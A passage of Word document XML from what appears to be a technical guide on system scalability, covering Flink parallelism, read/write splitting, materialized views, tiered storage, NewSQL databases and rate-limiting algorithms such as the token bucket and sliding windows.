    <w:p w14:paraId="35CC44FD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scalability model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F798B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Process data as it arrives, not in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66CF51" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scaling: Add more stream processing instances (consumers), each handles a partition of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C4025" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Flink scales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5D6F5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each operator (map, filter, aggregate) has a configurable parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34573D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>With parallelism=12 for an aggregation operator, Flink runs 12 parallel instances across the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0377A7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Input stream is partitioned by key, distributed to operator instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C124039" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Stateful operators (windows, aggregations) maintain per-partition state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53369C9A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Checkpointing ensures state is recoverable on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122AE3D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="65096BBD">
          <v:rect id="_x0000_i2300" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A834262" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Database-Specific Scalability Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78969CEA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Connection-Level: Read/Write Splitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EABC0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application-level routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDFD092" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Write queries → primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B51597D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Read queries → replicas (round-robin or least-connections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2F232" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Frameworks/ORMs often support this natively (Rails' multiple databases, Spring's @Transactional(readOnly=true) routing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F721D37" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>15.2 Query-Level: Materialized Views</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D79189" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A complex query (multiple JOINs, aggregations) takes 5 seconds. Called thousands of times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F70458" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Materialized view:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Pre-compute and store the result. Reads are instant. Periodically refresh the materialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E7A0F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Converts expensive computation (done once) into a simple table scan (done many times).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D8657" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Storage-Level: Tiered Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442778DE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot tier:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> NVMe SSDs, maximum IOPS. Recent/active data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3954BE81" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Warm tier:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Standard SSDs. Accessed occasionally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D3D40" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cold tier:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> HDDs or object storage (S3). Archival data, rarely accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C36053" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data automatically migrates between tiers based on access patterns. The system appears to hold unlimited data while keeping costs manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952F9BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.4 NewSQL — Scaling Without Sacrificing ACID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43B13D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How systems like CockroachDB/Spanner scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F32204" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data is divided into ranges (similar to shards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346CB76A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Ranges are distributed across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C52DAE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each range is replicated via Raft consensus (strong consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7653B0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Distributed transactions use 2PC + MVCC + synchronized clocks (TrueTime in Spanner's case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52755ADB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding nodes → automatic range splitting and rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B6E2E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Horizontal scalability with ACID transactions. The "holy grail" — though with higher per-query latency than a single-node database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EC6C2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="357714B7">
          <v:rect id="_x0000_i2301" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BD79E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Rate Limiting and Throttling for Scalability Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DBABC1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 Why Rate Limiting is a Scalability Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58DF69" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Without rate limiting, a single abusive client (or bot, or bug) can consume disproportionate resources, effectively denying service to everyone else. Rate limiting ensures fair resource allocation and protects backend capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F7FE1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Rate Limiting Algorithms — Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59D88A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token Bucket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD52570" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A bucket holds up to B tokens (burst capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A048B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Tokens are added at rate R per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D0D95" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each request consumes one token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DED2BC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If no tokens available → request is rejected (or queued).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77476CAE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal state:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> {tokens: float, last_refill_time: timestamp}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A214F1E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On each request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4E7C6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Calculate tokens to add: elapsed_time × R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C6168" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Add tokens (cap at B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51C1C0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If tokens ≥ 1: allow, subtract 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782BD0A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If tokens &lt; 1: reject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AFDBF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why token bucket is popular:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Allows bursts (up to B requests instantly) while enforcing an average rate (R/sec). Maps well to real traffic patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0595C7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sliding Window Log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774FC3D6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Store timestamp of every request in a window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18F30F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>On new request: count requests in the last N seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A316C47" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If count ≥ limit → reject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513B3DE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Storing every timestamp is memory-expensive for high-volume APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7F77C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sliding Window Counter (hybrid):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E0D7C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Divide time into fixed windows (e.g., 1-minute windows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43284C27" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Track count per window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE429D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>For the current moment, interpolate between current window and previous window based on position within the current window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E880E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C66737" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Previous window (12:00–12:01): 80 requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72728F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Current window (12:01–12:02): 30 requests so far</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1C007" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Current position: 15 seconds into the window (25% in)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A508B7B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Estimated count: 80 × 75% + 30 = 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03DDB3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If limit is 100 → allow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525D0B25" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed rate limiting challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568172AA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With multiple application servers, the rate limiter state must be shared:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F18D6FF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centralized (Redis):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> All instances check/increment a counter in Redis. Consistent but adds latency (network round-trip per request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FCDC6A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local + sync:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each instance has a local counter, periodically syncs. Less accurate but faster.</w:t>
      </w:r>
    </w:p>
